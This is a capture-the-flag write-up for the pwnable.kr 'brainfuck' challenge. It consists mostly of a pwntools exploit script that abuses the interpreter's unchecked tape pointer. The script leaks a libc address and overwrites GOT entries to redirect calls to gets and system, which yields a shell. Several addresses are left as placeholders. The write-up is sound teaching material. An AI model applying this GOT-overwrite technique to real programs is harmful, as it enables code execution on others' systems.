pwnable.kr brainfuck writeup

0x01 Overview

0x02 PoC

from pwn import *

# Exploit script for the pwnable.kr "brainfuck" challenge, kept as a flat
# pwntools script. NOTE: every `?` below is a placeholder the writeup leaves
# unfilled, so this file does not parse as written.
#
# The decompiled interpreter routine is reproduced here for reference. The
# security-relevant point is in the '<' and '>' cases: `p` is decremented /
# incremented without any check against the tape's bounds, so '.' and ','
# become a one-byte out-of-bounds read / write at whatever address p has been
# walked to. The program-side fix is to reject any '<' / '>' that would move p
# outside the tape buffer; full RELRO (read-only GOT after relocation) would
# additionally block the GOT overwrites this script relies on.
'''
int __cdecl do_brainfuck(char a1)
{
int result; // eax
_BYTE *v2; // ebx

result = a1 - 43; // p = 0804A0A0
switch ( a1 )
{
case '+':
result = p;
++*(_BYTE *)p; // (*p)++
break;
case ',':
v2 = (_BYTE *)p;
result = getchar();
*v2 = result; // *(char *)p = getchar()
break;
case '-':
result = p;
--*(_BYTE *)p; // (*p)--
break;
case '.':
result = putchar(*(char *)p); // print char *p
break;
case '<':
result = --p; // p=p-1
break;
case '>':
result = ++p; // p=p+1
break;
case '[':
result = puts("[ and ] not supported.");
break;
default:
return result;
}
return result;
}
'''

# Initial value of the tape pointer p (matches `p = 0804A0A0` in the
# decompiled code above); all '<' counts below are measured from here.
b = 0x804A0A0

# putchar GOT entry: read with '.' to leak a libc address.
# Placeholder left unfilled by the writeup.
putchar_got = ?

# memset GOT entry: overwritten with the address of glibc gets,
# so the later memset(s) call becomes gets(s).
# gets(s)
memset_got = ?

# fgets GOT entry: overwritten with the address of glibc system,
# so the later fgets(s) call becomes system(s).
# system(s)
fgets_got = ?

# Distances of system and gets from putchar inside libc. Placeholders; the
# values depend on the target's libc build and are not given in the writeup.
# glibc put char addr ?
# glibc system addr ?
system_addr_to_putchar = ? - ?
gets_addr_to_putchar = ? - ?

# Address of _start; it is written into the putchar GOT slot below so that
# the final '.' presumably re-enters the program from the top.
# start address
start = 0x080484E0

# 0x01 open the connection
brainfuck = remote("pwnable.kr", 9001)
brainfuck.recvuntil(b']\n')

# 0x02 build the payload
# The first '.' is sent before anything else because of lazy binding
# (original author's note; presumably so the putchar GOT slot holds a
# resolved libc address by the time it is read).
# Layout of the brainfuck program, one line per step:
#   line 1: '.'                      -> one byte of output (consumed by recv(1) below)
#   line 2: walk p from b to putchar_got, '.>'*4 leaks the 4-byte GOT entry
#   line 3: walk back 4, ',>'*4 overwrites the putchar slot (4 getchar() calls), walk back 4
#   line 4: walk to memset_got, ',>'*4 overwrites it, walk back 4
#   line 5: walk to fgets_got, ',>'*4 overwrites it, walk back 4, then '.' calls
#           the now-replaced putchar
# Comments cannot follow the line-continuation backslashes, hence this block.
payload = b'.'+ \
b'<'*(b-putchar_got) + b'.>'*4 + \
b'<'*4 + b',>'*4 + b'<'*4 + \
b'<'*(putchar_got-memset_got) + b',>'*4 + b'<'*4 + \
b'<'*(memset_got-fgets_got) + b',>'*4 + b'<'*4 + b'.'

# 0x03 read the libc leak
# The whole program is sent at once; output is then consumed in the order
# the '.' commands appear, and each ',' blocks on a byte we send later.
brainfuck.sendline(payload)

# The single byte printed by the leading '.'.
what = brainfuck.recv(1)
print("what?: ", what)

# The 4 bytes printed by '.>'*4: putchar's resolved address in libc.
base = brainfuck.recv(4)
putchar_addr = int.from_bytes(base, "little")
print("putchar got: ", base, " ", hex(putchar_addr))

# 0x04 replace putchar's GOT entry with _start
# Consumed by the first ',>'*4 group (4 getchar() calls at putchar_got).
brainfuck.send(start.to_bytes(4, 'little'))

# 0x05 replace memset with gets and fgets with system
# Both addresses are derived from the leak plus the libc-relative offsets above.
gets_addr = putchar_addr + gets_addr_to_putchar
print("gets got: ", hex(gets_addr))
# Consumed by the second ',>'*4 group (at memset_got).
brainfuck.send(gets_addr.to_bytes(4, 'little'))

system_addr = putchar_addr + system_addr_to_putchar
print("system got: ", hex(system_addr))
# Consumed by the third ',>'*4 group (at fgets_got).
brainfuck.send(system_addr.to_bytes(4, 'little'))

# 0x06 send the string that gets() will read
# Presumably read by gets (memset's slot) after the restart and then passed
# to system (fgets's slot), per the gets(s)/system(s) notes above.
brainfuck.send(b'/bin/sh\x00')

# 0x07 get a shell
brainfuck.interactive()
Author

lyq1996

Posted on

2021-09-15

Updated on

2021-10-10
